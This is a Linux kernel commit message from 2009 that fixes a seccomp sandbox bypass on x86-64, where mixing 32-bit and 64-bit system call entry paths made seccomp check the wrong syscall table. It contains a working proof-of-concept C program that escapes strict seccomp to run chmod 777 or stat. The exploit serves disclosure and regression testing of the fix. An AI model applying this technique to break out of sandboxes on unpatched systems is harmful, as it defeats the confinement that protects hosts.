Roland McGrath 5b1017404a x86-64: seccomp: fix 32/64 syscall hole
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process can make a 32-bit system call with int $0x80.

In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table.  The fix is simple: test TS_COMPAT
instead of TIF_IA32.  Here is an example exploit:

	/* test case for seccomp circumvention on x86-64

	   There are two failure modes: compile with -m64 or compile with -m32.

	   The -m64 case is the worst one, because it does "chmod 777 ." (could
	   be any chmod call).  The -m32 case demonstrates it was able to do
	   stat(), which can glean information but not harm anything directly.

	   A buggy kernel will let the test do something, print, and exit 1; a
	   fixed kernel will make it exit with SIGKILL before it does anything.
	*/

	#define _GNU_SOURCE
	#include <assert.h>
	#include <inttypes.h>
	#include <stdio.h>
	#include <linux/prctl.h>
	#include <sys/stat.h>
	#include <unistd.h>
	#include <asm/unistd.h>

	int
	main (int argc, char **argv)
	{
	  char buf[100];
	  static const char dot[] = ".";
	  long ret;
	  unsigned st[24];

	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

	#ifdef __x86_64__
	  assert ((uintptr_t) dot < (1UL << 32));
	  asm ("int $0x80 # %0 <- %1(%2 %3)"
	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
	  ret = snprintf (buf, sizeof buf,
			  "result %ld (check mode on .!)\n", ret);
	#elif defined __i386__
	  asm (".code32\n"
	       "pushl %%cs\n"
	       "pushl $2f\n"
	       "ljmpl $0x33, $1f\n"
	       ".code64\n"
	       "1: syscall # %0 <- %1(%2 %3)\n"
	       "lretl\n"
	       ".code32\n"
	       "2:"
	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
	  if (ret == 0)
	    ret = snprintf (buf, sizeof buf,
			    "stat . -> st_uid=%u\n", st[7]);
	  else
	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
	#else
	# error "not this one"
	#endif

	  write (1, buf, ret);

	  syscall (__NR_exit, 1);
	  return 2;
	}

Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
  at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-02 15:41:30 -08:00